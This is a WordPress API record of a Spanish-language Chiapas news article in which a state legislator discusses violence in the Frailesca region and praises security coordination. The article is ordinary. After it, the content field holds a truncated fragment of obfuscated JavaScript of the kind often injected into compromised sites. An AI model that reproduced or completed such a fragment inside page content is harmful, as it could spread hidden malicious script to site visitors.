{"id":25957,"date":"2026-01-02T01:43:45","date_gmt":"2026-01-02T01:43:45","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25957"},"modified":"2026-01-02T01:43:46","modified_gmt":"2026-01-02T01:43:46","slug":"celulas-delictivas-buscan-recuperar-espacios-de-poder-pero-autoridades-han-actuado","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25957","title":{"rendered":"C\u00e9lulas delictivas buscan recuperar espacios de poder, pero autoridades han actuado"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"765\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000523873-1024x765.jpg\" alt=\"\" class=\"wp-image-25958\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000523873-1024x765.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000523873-300x224.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000523873-768x574.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000523873-1536x1148.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000523873.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><br>Manuel Jim\u00e9nez.<br>1 de enero del 2026. Tuxtla Guti\u00e9rrez. Tras los hechos de violencia registrados en la regi\u00f3n Frailesca de Chiapas, que generaron alarma a nivel local e incluso repercusi\u00f3n nacional, Mario Guill\u00e9n Guill\u00e9n, presidente de la Junta de Coordinaci\u00f3n Pol\u00edtica (Jucopo) del Congreso del Estado, asegur\u00f3 que la seguridad en la entidad ha tenido un \u201cgran avance\u201d, aunque admiti\u00f3 la persistencia de c\u00e9lulas delictivas que buscan recuperar espacios de poder.<br>En entrevista, el diputado subray\u00f3 que la construcci\u00f3n de la paz es un trabajo diario y enfatiz\u00f3 el cambio en la respuesta institucional.<br>\u201cQuiero dejar muy en claro la actuaci\u00f3n del Estado siempre que se cometa un delito y que ataquen a la poblaci\u00f3n, el Estado va a responder y les va a aplicar la ley. Nadie va a ser exento de la aplicaci\u00f3n de la ley\u201d, afirm\u00f3 con contundencia.<br>Guill\u00e9n Guill\u00e9n hizo hincapi\u00e9 en que hoy existe un \u201cataque frontal en contra de la impunidad\u201d, que era lo que m\u00e1s lastimaba a la sociedad en el pasado.<br>\u201cHoy, contrario al pasado, cometen un delito, pero el Estado est\u00e1 presente, cuidando siempre a la poblaci\u00f3n que es la parte m\u00e1s importante Chiapas respira un nuevo aire y estamos muy orgullosos de todo el trabajo que se ha realizado\u201d.<br>Al ser cuestionado espec\u00edficamente sobre los incidentes y el uso de veh\u00edculos clonados por la delincuencia, el presidente de la Jucopo reconoci\u00f3 la capacidad log\u00edstica de los grupos delictivos, pero confi\u00f3 en la fuerza del Estado.<br>\u201cSin duda la delincuencia tiene los recursos necesarios, pero cuando el Estado en coordinaci\u00f3n con la Federaci\u00f3n y el estado trabajan de manera conjunta, yo no he visto ninguna historia donde la delincuencia le vaya a ganar al Estado\u201d.<br>Calific\u00f3 los sucesos de la Frailesca como \u201chechos aislados\u201d y apunt\u00f3 a una intenci\u00f3n de alarmar a la poblaci\u00f3n. Para contextualizar, narr\u00f3 su percepci\u00f3n de normalidad en otras zonas:<br>\u201cNo en Tuxtla vive es otra la realidad, yo quiero ir a Tonal\u00e1, no tengo miedo, voy a Frontera Comalapa, cruzo la sierra y puedo transitar libremente\u201d.<br>El legislador destac\u00f3 la alineaci\u00f3n y coordinaci\u00f3n entre los distintos niveles de gobierno y fuerzas de seguridad como el factor determinante para mantener y mejorar los resultados.<br>\u201cCreo que el gobernador est\u00e1 muy claro y la presidenta Claudia Sheinbaum de la misma manera, junto con el secretario de Seguridad P\u00fablica, Garc\u00eda Harfuch, y las instituciones estatales, el mismo Ej\u00e9rcito Mexicano han tenido una excelente coordinaci\u00f3n y creo que cada vez van a ser menos estas noticias\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez.1 de enero del 2026. Tuxtla Guti\u00e9rrez. Tras los hechos de violencia registrados en la regi\u00f3n Frailesca de Chiapas, que generaron alarma a nivel local e incluso repercusi\u00f3n nacional, Mario Guill\u00e9n Guill\u00e9n, presidente de la Junta de Coordinaci\u00f3n Pol\u00edtica (Jucopo) del Congreso del Estado, asegur\u00f3 que la seguridad en la entidad ha tenido un &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25958,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-25957","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25957","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25957"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25957\/revisions"}],"predecessor-version":[{"id":25959,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25957\/revisions\/25959"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25958"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25957"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25957"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25957"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}